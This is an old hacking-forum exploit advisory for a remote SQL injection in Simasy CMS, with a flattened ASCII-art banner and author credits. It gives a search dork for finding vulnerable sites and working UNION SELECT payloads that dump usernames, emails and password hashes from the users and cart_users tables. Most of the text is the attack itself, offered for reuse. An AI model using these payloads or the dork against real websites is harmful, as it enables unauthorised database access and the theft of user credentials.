simasycms-sql.txt
Posted on 21 August 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu # # -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE # ################################################################ # # Author: r45c4l & dapiates (from lossie i.t security forums) # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Exploit: Remote SQL Injection in Simasy CMS # # Soft.Site: http://www.simasy.com/ # # Dork: Powered by Simasy CMS # # POC:-index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/* # # # #Example: # #http://localhost/index.php?page=2&id=97%20AND%201=0%20UNION%20SELECT%20ALL%201,group_concat(id,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+cart_users/* # # ################################################################ # Vuln Discovered 21/08/2008
